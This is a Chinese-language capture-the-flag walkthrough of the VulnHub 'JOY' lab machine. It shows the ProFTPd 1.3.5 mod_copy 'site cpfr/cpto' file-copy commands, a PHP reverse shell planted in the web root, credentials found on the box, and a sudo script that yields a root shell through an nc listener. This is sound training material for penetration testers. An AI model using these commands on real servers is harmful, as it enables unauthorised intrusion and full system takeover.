背对山河,踏清风明月
下载地址:https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
主机发现&端口扫描
直接访问,泄露版本信息
上漏洞检索,只有一个拒绝服务攻击,并不能直接getshell,切换思路
端口详细扫描,发现了一个FTP匿名登录
nmap -sS 10.10.10.198 -T4 -p- -A
登录ftp
ftp 10.10.10.198
# 密码为空,直接回车
看到两个可执行文件,下载下来
get reminder
get directory
赋予执行权限(并不能直接执行)
直接cat directory,看上去是用户patrick的用户目录,毕竟有一个上级目录就是root权限的信息
Patrick's Directory
total 132
drwxr-xr-x 18 patrick patrick 4096 Feb 4 21:20 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw-r--r-- 1 patrick patrick 24 Feb 4 21:15 1kd8va0o50OV3H28HZ26ffN7JMeU0wG8J996ftHpRuQrAAQqKoxQfCs5aB8GFXC7.txt
-rw-r--r-- 1 patrick patrick 24 Feb 4 20:55 6kK0S15FpM4iECwlY9vBMOcz0WHalkAEQZIHFBUDxztRq1We1v5GYxAMdxMbUba6.txt
-rw-r--r-- 1 patrick patrick 0 Feb 4 21:15 aOY5oYk9g0WS0nXasU6l2EvjrFCl4hqk.txt
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache
-rw-r--r-- 1 patrick patrick 0 Feb 4 20:50 chTSFHiKgRfHiwgp8LV9u4tDwhpdGnKp.txt
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
-rw-r--r-- 1 patrick patrick 0 Feb 4 21:20 Dp9d3TstWJP6Yczetnrx4GnQgkVE250L.txt
-rw-r--r-- 1 patrick patrick 24 Feb 4 20:50 gAOnh9TLwMyOEViffEXpFAt3LcChEuxcWeqc3BPcQFIRomrGdizTYKuJlHuOSF4z.txt
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
-rw-r--r-- 1 patrick patrick 24 Feb 4 21:05 obzvvHxWWlOzg8z8uOdy2Qd94dVMZAs2glSOp18HRCRl9jqmB4x5PVoqLsqM0sAD.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
-rw-r--r-- 1 patrick patrick 0 Feb 4 21:05 Q9lbdQPPywIiNT5Dagi0Bg9OMx0CQ0ts.txt
d--------- 2 root root 4096 Jan 9 2019 script
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 24 Feb 4 21:20 UKwKOJqE9XVI3TaEvKZJr8CWu1kVXOWTFZQqjhaiES7QydPE1KEcY2bzuLsOpnYc.txt
-rw-r--r-- 1 patrick patrick 0 Feb 4 21:00 V56ziCPycMNIbNplkqYedQXlM6G9YO66.txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos
-rw-r--r-- 1 patrick patrick 0 Feb 4 21:10 Wp2Twcw4FWSRMYDe8mniQ1BZhHyhYHqX.txt
-rw-r--r-- 1 patrick patrick 0 Feb 4 20:55 XFsA7qBE2voGAtiuZfQ0GQMxE8RitITZ.txt
-rw-r--r-- 1 patrick patrick 24 Feb 4 21:10 YbxpYyx2v9VnifKxuctWG1Y3BzXp8dGJrQrlXbDHK0qp0ZcBRudy7zzN2g8Rxc9F.txt
-rw-r--r-- 1 patrick patrick 24 Feb 4 21:00 YPE8Q4kbBE98OJCytjadCwhK2W9TMb5UPnCP0cHnGsS2dvpwXrppfAViwZmPH3Zq.txt
You should know where the directory can be accessed.
Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
另外一个reminder
,目前可能用不上,有一个version_control包含了版本信息的文件
┌──(root㉿kali)-[/data/demo]
└─# cat reminder
Lock down this machine!
继续信息收集,目录扫描(没有利用方式)
dirsearch -u http://10.10.10.198/ossec/
这里需要利用到一个ProFTPd的拷贝漏洞,这样就能从ftp服务器上下载version_control这个版本文件了
相关学习文章:https://www.freebuf.com/column/209238.html
┌──(root㉿kali)-[~]
└─# telnet 10.10.10.198 21
Trying 10.10.10.198...
Connected to 10.10.10.198.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/version_control
350 File or directory exists, ready for destination name
site cpto /home/ftp/upload/version_control
250 Copy successful
quit
221 Goodbye.
Connection closed by foreign host.
此时再登录FTP服务器,就能看到多出了一个文件信息
# 下载
get version_control
找到服务版本了,ProFTPd,1.3.5
┌──(root㉿kali)-[~]
└─# cat version_control
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
We should switch to OpenSSH and upgrade ProFTPd.
Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
复制到当前目录下并执行
searchsploit -m 36803
python2 36803.py
执行脚本的时候它直接卡在这儿了
查看脚本内容,这是一个网站的目录
这个目录呢在刚刚的版本文件version_control
中也有 /var/www/tryingharderisjoy.
┌──(root㉿kali)-[~]
└─# cat version_control
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
We should switch to OpenSSH and upgrade ProFTPd.
Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
但还是不行,msf可以利用,这里不做过多解释,继续手动
我们得知了网站的目录/var/www/tryingharderisjoy
,那么就利用刚刚的文件复制漏洞
命令如下
┌──(root㉿kali)-[/usr/share/webshells/php]
└─# telnet 10.10.10.198 21
Trying 10.10.10.198...
Connected to 10.10.10.198.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/upload/php-reverse-shell.php
350 File or directory exists, ready for destination name
site cpto /var/www/tryingharderisjoy/php-reverse-shell.php
250 Copy successful
quit
221 Goodbye.
Connection closed by foreign host.
反弹成功
开始提权,在网站根目录下面看到了patricksecretsofjoy文件包含了账号密码信息
www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls -al
ls -al
total 116
drwxr-xr-x 8 www-data www-data 4096 Jan 6 2019 .
drwxr-xr-x 3 www-data www-data 4096 Feb 4 22:41 ..
-rw-r--r-- 1 www-data www-data 92 Jul 19 2016 .hgtags
-rw-r--r-- 1 www-data www-data 262 Dec 28 2018 .htaccess
-rw-r--r-- 1 www-data www-data 44 Dec 28 2018 .htpasswd
-rwxr-xr-x 1 www-data www-data 317 Jul 19 2016 CONTRIB
-rw-r--r-- 1 www-data www-data 35745 Jul 19 2016 LICENSE
-rw-r--r-- 1 www-data www-data 2106 Jul 19 2016 README
-rw-r--r-- 1 www-data www-data 923 Jul 19 2016 README.search
drwxr-xr-x 3 www-data www-data 4096 Jul 19 2016 css
-rw-r--r-- 1 www-data www-data 218 Jul 19 2016 htaccess_def.txt
drwxr-xr-x 2 www-data www-data 4096 Jul 19 2016 img
-rwxr-xr-x 1 www-data www-data 5177 Jul 19 2016 index.php
drwxr-xr-x 2 www-data www-data 4096 Jul 19 2016 js
drwxr-xr-x 3 www-data www-data 4096 Dec 28 2018 lib
-rw-r--r-- 1 www-data www-data 462 Jul 19 2016 ossec_conf.php
-rw-r--r-- 1 www-data www-data 134 Jan 6 2019 patricksecretsofjoy
-rwxr-xr-x 1 www-data www-data 2471 Jul 19 2016 setup.sh
drwxr-xr-x 2 www-data www-data 4096 Dec 28 2018 site
drwxrwxrwx 2 www-data www-data 4096 Feb 4 21:32 tmp
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat .htpasswd
cat .htpasswd
admin:$apr1$3Jv2Ok6H$4BMdXenVBmD2E3kXe8RVL.
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
how would these hack3rs ever find such a page?
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su root
su root
Password: howtheheckdoiknowwhattherootpasswordis
su: Authentication failure
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su patrick
su patrick
Password: apollo098765
patrick@JOY:/var/www/tryingharderisjoy/ossec$ whoami
whoami
patrick
有了密码直接sudo -l,看样子可以直接利用这个test文件提权了,但是这个目录无法访问,没有权限
不要忘了我们怎么进来的,这里可以利用刚刚的任意文件复制漏洞,进行复制呀
cd ~
echo 'php /var/www/tryingharderisjoy/php-reverse-shell.php' > test
kali
┌──(root㉿kali)-[~]
└─# telnet 10.10.10.198 21
Trying 10.10.10.198...
Connected to 10.10.10.198.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/test
350 File or directory exists, ready for destination name
site cpto /home/patrick/script/test
250 Copy successful
quit
221 Goodbye.
Connection closed by foreign host.
靶机提权即可
sudo /home/patrick/script/test
kali
┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.198] 44710
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
23:13:50 up 2:28, 0 users, load average: 0.04, 0.05, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
#
至此提权成功
原文始发于微信公众号(泷羽Sec):【oscp】JOY,ProFTPd拷贝漏洞提权
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论